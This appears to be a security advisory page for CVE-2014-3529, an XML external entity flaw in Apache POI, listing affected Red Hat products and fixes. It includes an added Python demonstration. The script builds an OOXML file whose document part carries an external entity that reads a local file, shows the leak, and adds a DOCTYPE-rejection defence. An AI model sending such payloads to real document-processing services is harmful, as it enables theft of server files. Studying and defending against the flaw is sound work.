Description
The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
It was found that Apache POI would resolve entities in OOXML documents. A remote attacker able to supply OOXML documents that are parsed by Apache POI could use this flaw to read files accessible to the user running the application server, and potentially perform more advanced XML External Entity (XXE) attacks.
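The mechanics of the flaw, as an added example (this is not code from Apache POI, from Red Hat, or from this advisory): an OOXML document is a zip of XML parts, so an attacker who can plant a DOCTYPE with an external entity in one part gets that entity resolved by any parser that follows entity references. The script below builds a constructed, deliberately minimal (not Word-valid) package with such a payload in word/document.xml, parses that part with Python's standard-library expat-based xml.sax once with external general entities enabled (mirroring the pre-3.10.1 behaviour described above) and once with them disabled, and adds the pre-parse check a practitioner would want: reject any package whose parts carry a DOCTYPE at all. The secret file, its contents, and all function names are assumptions made for the demonstration.

```python
"""Constructed XXE-in-OOXML demonstration (standard library only)."""
import io
import os
import re
import tempfile
import xml.sax
import xml.sax.handler
import zipfile

# Minimal content-types part so the zip looks like an OOXML package (constructed).
CONTENT_TYPES = b"""<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml"
    ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")


def build_xxe_ooxml(secret_path: str) -> bytes:
    """Return a constructed OOXML package whose document part declares an external
    entity pointing at secret_path and references it inside a text run."""
    document = (
        b'<?xml version="1.0" encoding="UTF-8"?>\n'
        b"<!DOCTYPE w:document [\n"
        b'  <!ENTITY xxe SYSTEM "' + secret_path.encode() + b'">\n'
        b"]>\n"
        b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        b"<w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects every character-data callback, i.e. the document's text content."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def extract_text(part_xml: bytes, resolve_external_entities: bool) -> str:
    """Parse one XML part with xml.sax (expat) and return its text content.
    With resolve_external_entities=True the parser follows the SYSTEM entity and
    the target file's bytes land in the text, which is the XXE read; with False
    the reference is left unresolved."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(part_xml))
    return "".join(collector.chunks)


def parts_with_doctype(ooxml: bytes) -> list:
    """Pre-parse check: name every part of the package that carries a DOCTYPE.
    Legitimate OOXML parts never need one, so any hit is a red flag. The check is
    deliberately coarse (it also fires on a DOCTYPE inside a comment)."""
    with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
        return [i.filename for i in z.infolist() if DOCTYPE_RE.search(z.read(i.filename))]


def safe_document_text(ooxml: bytes, part: str = "word/document.xml") -> str:
    """Hardened path: refuse packages with a DOCTYPE anywhere, then parse with
    external entity resolution off. Two layers, because the DOCTYPE check stops
    the document before it reaches any parser that might be configured differently."""
    flagged = parts_with_doctype(ooxml)
    if flagged:
        raise ValueError("DOCTYPE found in OOXML part(s): " + ", ".join(flagged))
    with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
        return extract_text(z.read(part), resolve_external_entities=False)


def run_demo() -> dict:
    """Create a secret file (constructed), build the malicious package, and return
    what the vulnerable parser leaks, what the hardened parser yields, which parts
    the DOCTYPE check flags, and whether safe_document_text rejected the package."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db-password=hunter2")  # constructed secret the attacker wants
        secret_path = f.name
    try:
        ooxml = build_xxe_ooxml(secret_path)
        with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
            part = z.read("word/document.xml")
        result = {
            "leaked": extract_text(part, resolve_external_entities=True),
            "blocked": extract_text(part, resolve_external_entities=False),
            "flagged": parts_with_doctype(ooxml),
        }
        try:
            safe_document_text(ooxml)
            result["rejected"] = False
        except ValueError:
            result["rejected"] = True
        return result
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The "leaked" value shows why the advisory talks about reading files accessible to the user running the application server: whatever the process can open, the entity can pull into the parsed document, and an application that later renders, indexes, or returns that text hands it to the attacker. The "flagged" list is the cheap control to put in front of any OOXML ingestion path, independent of which library version is deployed.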
Statement
Red Hat Product Security has determined that CVE-2014-3529 is not exploitable by default in JBoss Portal Platform as provided by Red Hat. This flaw would only be exploitable if the Apache POI library provided by JBoss Portal Platform were used by a custom application to process user-supplied XML documents.
Affected packages
| Platform | Package | State | Advisory | Release date (dd.mm.yyyy) |
|---|---|---|---|---|
| Red Hat BPM Suite 6 | apache-poi | Affected | | |
| Red Hat Enterprise Virtualization 3 | jasperreports-server-pro | Affected | | |
| Red Hat JBoss BRMS 5 | apache-poi | Will not fix | | |
| Red Hat JBoss BRMS 6 | apache-poi | Affected | | |
| Red Hat JBoss Portal 5 | apache-poi | Will not fix | | |
| Red Hat JBoss BPMS 6.0 | | Fixed | RHSA-2014:1399 | 13.10.2014 |
| Red Hat JBoss BRMS 6.0 | | Fixed | RHSA-2014:1400 | 13.10.2014 |
| Red Hat JBoss Data Virtualization 6.0 | apache-poi | Fixed | RHSA-2014:1398 | 13.10.2014 |
| Red Hat JBoss Fuse Service Works 6.0 | apache-poi | Fixed | RHSA-2014:1370 | 09.10.2014 |
| Red Hat JBoss Portal 6.2 | apache-poi | Fixed | RHSA-2015:1009 | 14.05.2015 |
Additional information
CVSS2: 5 Medium
Related vulnerabilities
- The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
- Improper Restriction of XML External Entity Reference in Apache POI